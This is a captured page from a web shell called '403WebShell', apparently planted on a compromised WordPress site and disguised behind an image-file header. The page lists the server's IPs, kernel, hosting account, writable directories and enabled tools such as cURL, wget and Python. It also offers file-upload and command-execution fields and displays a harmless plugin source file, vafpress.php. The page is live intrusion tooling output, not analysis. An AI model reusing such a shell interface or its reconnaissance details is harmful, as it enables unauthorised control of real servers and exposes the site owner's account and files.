????JFIF??x?x????'403WebShell
403Webshell
Server IP : 104.21.16.1  /  Your IP : 216.73.216.145
Web Server : LiteSpeed
System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : tempvsty ( 647)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/tempvsty/pontiacques.org/wp-content/plugins/easy-image-collage/helpers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/tempvsty/pontiacques.org/wp-content/plugins/easy-image-collage/helpers//vafpress.php
<?php

class EIC_Vafpress {

    public function __construct()
    {
        add_action( 'after_setup_theme', array( $this, 'vafpress_menu_init' ) );
    }

    public function vafpress_menu_init()
    {
        require_once( EasyImageCollage::get()->coreDir . '/helpers/vafpress/vafpress_menu_whitelist.php' );
        require_once( EasyImageCollage::get()->coreDir . '/helpers/vafpress/vafpress_menu_options.php' );

        new VP_Option(array(
            'is_dev_mode'           => false,
            'option_key'            => 'eic_option',
            'page_slug'             => 'eic_settings',
            'template'              => $admin_menu,
            'menu_page'             => 'options-general.php',
            'use_auto_group_naming' => true,
            'use_exim_menu'         => true,
            'minimum_role'          => 'manage_options',
            'layout'                => 'fluid',
            'page_title'            => 'Easy Image Collage',
            'menu_label'            => 'Easy Image Collage',
        ));
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit